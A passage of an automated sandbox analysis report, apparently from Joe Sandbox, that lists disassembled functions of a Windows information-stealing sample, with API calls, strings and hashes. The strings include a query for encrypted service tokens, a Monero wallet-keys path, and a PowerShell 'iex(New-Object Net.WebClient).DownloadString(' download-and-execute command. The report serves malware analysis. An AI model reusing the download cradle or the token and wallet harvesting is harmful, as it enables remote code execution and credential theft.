                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0100BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0100BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0100BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 36786ffab44c8f0e6292a72f03d0701a5bb9bf01c6d891a1df0172c008f27992
                        • Instruction ID: e25829b5aca1dbd522dad186624f5d6c5917db71f85d2087a5658192b107ff24
                        • Opcode Fuzzy Hash: 36786ffab44c8f0e6292a72f03d0701a5bb9bf01c6d891a1df0172c008f27992
                        • Instruction Fuzzy Hash: 5AB1A176A11149DBDF14FBA0DD94EEE7339AF64210F404158F983A7098EF386E49CBA0
                        Function 01016770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: f514d1cca8c2d2aa011100ef876457be3ccbc2d4c1fbcdeed71a595baf092273
                        • Instruction ID: 57179265e7cb2b1899184b01cc555a12acbe1316ce2e2a3aa2fe653d52b95828
                        • Opcode Fuzzy Hash: f514d1cca8c2d2aa011100ef876457be3ccbc2d4c1fbcdeed71a595baf092273
                        • Instruction Fuzzy Hash: 4CF03A34984209EFE368DFE0B90D76C7B70FB04702F040198F74B87284E6754A419B95
                        Function 01004FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 01004FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01004FD1
                        • InternetOpenA.WININET(01020DDF,00000000,00000000,00000000,00000000), ref: 01004FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 01005011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 01005041
                        • InternetCloseHandle.WININET(?), ref: 010050B9
                        • InternetCloseHandle.WININET(?), ref: 010050C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: dcd846c431be055b12c7dc645588762b403df7a07b28172c7c90d7c65244c65c
                        • Instruction ID: b0a3d0907d4ae1704552d510933f6e2442744c87158757e2ffc2b3dcd21e2c72
                        • Opcode Fuzzy Hash: dcd846c431be055b12c7dc645588762b403df7a07b28172c7c90d7c65244c65c
                        • Instruction Fuzzy Hash: 22311BB4A40218ABEB24CF54DC88BDDB7B4EB48704F1081D8F60AA7284D7706EC58F98
                        Function 010183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01018426
                        • wsprintfA.USER32 ref: 01018459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0101847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018499
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0189E320,00000000,000F003F,?,00000400), ref: 010184EC
                        • lstrlen.KERNEL32(?), ref: 01018501
                        • RegQueryValueExA.ADVAPI32(00000000,0189E1D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01020B34), ref: 01018599
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: c26e8c23a36654acf1c1f5858c72352424d57a824d8d554991a96f2ebb1e09e3
                        • Instruction ID: eff8a264892d7bd5b7cb31dd9ff89c54c9736f7aa90845de5c13d17bfbf4a365
                        • Opcode Fuzzy Hash: c26e8c23a36654acf1c1f5858c72352424d57a824d8d554991a96f2ebb1e09e3
                        • Instruction Fuzzy Hash: 05212775A40228ABEB24DB54DC84FE9B3B8FB48700F00C5D9E64AA7144DF756A85CFD4
                        Function 01017690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010176A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010176AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C320,00000000,00020119,00000000), ref: 010176DD
                        • RegQueryValueExA.ADVAPI32(00000000,0189E428,00000000,00000000,?,000000FF), ref: 010176FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 01017708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: f6c01c4fb536ac038345e274610e746d7ca18c20ce5ae00d4317012f77c3db0a
                        • Instruction ID: 13c65a413dbd46b8b392ca4c179bd82d4fd22ea47a6fa5431dcbde43162119c0
                        • Opcode Fuzzy Hash: f6c01c4fb536ac038345e274610e746d7ca18c20ce5ae00d4317012f77c3db0a
                        • Instruction Fuzzy Hash: 6401FFB9A80204BBE720DBE4E94DFADB7BCEB48701F104494FA4697288E67499048B50
                        Function 01017720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0101773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C320,00000000,00020119,010176B9), ref: 0101775B
                        • RegQueryValueExA.ADVAPI32(010176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0101777A
                        • RegCloseKey.ADVAPI32(010176B9), ref: 01017784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 4d86d2c85e0ecb23da48844b16cf795e08ebd636715ed044a011fb9d8096b385
                        • Instruction ID: 2bc16563b04d85614a43a822f773e679fec8d30c36dad30de79cafd744741dd9
                        • Opcode Fuzzy Hash: 4d86d2c85e0ecb23da48844b16cf795e08ebd636715ed044a011fb9d8096b385
                        • Instruction Fuzzy Hash: 4101F4B9A40308BBE710DBE4EC4DFAEB7B8EB48705F104559FA06A7285D67456008F51
                        Function 010099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                        • LocalFree.KERNEL32(0100148F), ref: 01009A90
                        • CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: daf45d9e8723ca62085467f4172bffa9ecfb4e85fec9bbab20f189dc63ec9561
                        • Instruction ID: 7497f9a5d68b250620c3e4aa8355c6436260ec9b3976aa89cbf54da513d2f83c
                        • Opcode Fuzzy Hash: daf45d9e8723ca62085467f4172bffa9ecfb4e85fec9bbab20f189dc63ec9561
                        • Instruction Fuzzy Hash: F2311C74A00209EFEF25CF94D949BAE77F5FF49354F104198E906A7284D774A981CFA0
                        Function 01014780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0189E488), ref: 010147DB
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014801
                        • lstrcat.KERNEL32(?,?), ref: 01014820
                        • lstrcat.KERNEL32(?,?), ref: 01014834
                        • lstrcat.KERNEL32(?,0188B5E0), ref: 01014847
                        • lstrcat.KERNEL32(?,?), ref: 0101485B
                        • lstrcat.KERNEL32(?,0189DA40), ref: 0101486F
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018D90: GetFileAttributesA.KERNEL32(00000000,?,01001B54,?,?,0102564C,?,?,01020E1F), ref: 01018D9F
                          • Part of subcall function 01014570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01014580
                          • Part of subcall function 01014570: RtlAllocateHeap.NTDLL(00000000), ref: 01014587
                          • Part of subcall function 01014570: wsprintfA.USER32 ref: 010145A6
                          • Part of subcall function 01014570: FindFirstFileA.KERNEL32(?,?), ref: 010145BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: b15a0745166650680ed83397b023eee80b62bd3c2ac57903cfbd362296273b38
                        • Instruction ID: d3da02a9cc8176defc550873cafda86a658d4bf038145e56dd22ff97fb4b1025
                        • Opcode Fuzzy Hash: b15a0745166650680ed83397b023eee80b62bd3c2ac57903cfbd362296273b38
                        • Instruction Fuzzy Hash: AD3184B6D4021997DB20F7B0DC88EDD737CAB58704F444589F35697084EA749789CB91
                        Function 01012C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 01012D85
                        Strings
                        • <, xrefs: 01012D39
                        • ')", xrefs: 01012CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 01012CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 01012D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 098959b303d95a7ab6232a9f2195db1a7395c0f3c90f1bab6b0cc724626959f1
                        • Instruction ID: 086dcf600a4438d5961088dc0ba84f8e6dbe87e70f72a80bc896d672eec62152
                        • Opcode Fuzzy Hash: 098959b303d95a7ab6232a9f2195db1a7395c0f3c90f1bab6b0cc724626959f1
                        • Instruction Fuzzy Hash: 2541FC71E01249DADB14EFA0D990FDDBB74AF24310F404019E486AB198EF782A8ACF90
                        Function 01009E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01009F41
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
